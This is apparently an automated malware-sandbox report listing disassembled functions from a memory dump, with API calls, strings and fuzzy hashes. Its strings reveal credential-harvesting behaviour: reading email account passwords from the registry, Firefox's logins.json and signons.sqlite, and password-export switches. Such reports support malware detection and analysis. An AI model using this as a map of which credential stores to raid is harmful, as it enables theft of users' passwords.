                                                                                                                                                                                                                        • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                      • API String ID: 1497257669-167382505
                                                                                                                                                                                                                      • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                      • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F5B8 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                      • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                      • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                      • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                      • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B94B Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                        • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                                        • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                                        • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                      • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                      • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004109F8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                      • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                      • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A6AF Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 710961058-601624466
                                                                                                                                                                                                                      • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                      • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410B15 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                      • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                      • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00441A6C Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                      • API String ID: 231171946-1411472696
                                                                                                                                                                                                                      • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                      • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C12B Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                                      • API String ID: 1012775001-1916105108
                                                                                                                                                                                                                      • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                      • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040EA92 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                                                        • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                                                        • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                                                        • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                                                        • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                                                        • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                                                        • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                                                        • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                                                        • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                                                        • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                                                        • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                        • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                      • API String ID: 3884059725-3138536805
                                                                                                                                                                                                                      • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                      • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040CAFA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                      • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                      • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443AD1 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                                                        • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                      • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                      • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F9AC Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
